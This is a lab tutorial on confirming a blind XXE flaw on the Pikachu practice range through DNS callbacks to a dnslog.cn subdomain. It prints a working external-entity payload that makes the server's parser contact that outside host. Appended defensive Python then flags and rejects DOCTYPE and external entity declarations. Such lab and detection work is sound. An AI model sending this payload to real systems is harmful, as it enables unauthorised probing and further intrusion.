DNSLog Vulnerability Detection (5) XXE Vulnerability Practical Combat
In this article, we will learn how to use the DNSLog platform to detect whether a target website has an XXE vulnerability. We will use the Pikachu practice range as a demonstration. First, let's open the XXE vulnerability page of the Pikachu range.
Suppose the page has an XXE vulnerability with no echo, that is, a blind XXE where the parsed result is never shown in the response. How can we use the DNSLog platform to detect whether the vulnerability exists?
First, we open the DNSLog service platform and click Get SubDomain to obtain a subdomain name. The subdomain name we obtained here is adswfw.dnslog.cn.
Next, we only need to submit the following payload, replacing the xxxxxx part with the subdomain name we obtained from the DNSLog service platform.
# Original payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://xxxxxx.dnslog.cn">%remote;]>
# Payload used in this article
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM
"http://adswfw.dnslog.cn">%remote;]>
Click submit.
[Screenshot: interface after submission]
Now we return to the DNSLog service platform and click Refresh Record, and the platform shows the DNS resolution record for our subdomain. The record means the server's XML parser tried to load the external entity, so we have verified through the DNSLog platform that there is an XXE vulnerability.
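The defender's side of the same test, as an added example that is not part of the original article: a Python pre-parse check that reports the DOCTYPE and external entity declarations in a request body without resolving them, so an endpoint can refuse such documents and log the host they point to. The function names and the benign sample are assumptions made for this illustration; the first sample is the article's payload.

```python
import xml.parsers.expat
from urllib.parse import urlparse

# Constructed sample: the article's payload as it would arrive in a request body.
SAMPLE_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE root [\n'
    '<!ENTITY % remote SYSTEM\n'
    '"http://adswfw.dnslog.cn">%remote;]>'
)
# Constructed benign input with no DTD at all.
SAMPLE_BENIGN = '<?xml version="1.0"?><note><to>bob</to></note>'


def inspect_xml(body):
    """Report DTD usage in body. expat only fetches an external entity through
    an ExternalEntityRefHandler, and none is installed, so nothing is resolved."""
    report = {"doctype": False, "external_entities": []}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = True
        if system_id:  # external DTD subset: <!DOCTYPE x SYSTEM "...">
            report["external_entities"].append(("(external DTD)", system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id:  # SYSTEM/PUBLIC entity: its content comes from a URI
            label = ("%" if is_param else "&") + name
            report["external_entities"].append((label, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError:
        pass  # probes are often malformed (this payload has no root element)
    return report


def should_reject(body):
    """Policy for endpoints that never need a DTD: refuse any DOCTYPE."""
    return inspect_xml(body)["doctype"]


def callback_hosts(body):
    """Hosts an entity-resolving parser would contact; useful for log triage."""
    uris = [uri for _, uri in inspect_xml(body)["external_entities"]]
    return sorted({urlparse(uri).hostname or uri for uri in uris})
```

Rejecting every DOCTYPE is stricter than filtering for known callback domains and does not depend on recognising the domain in use.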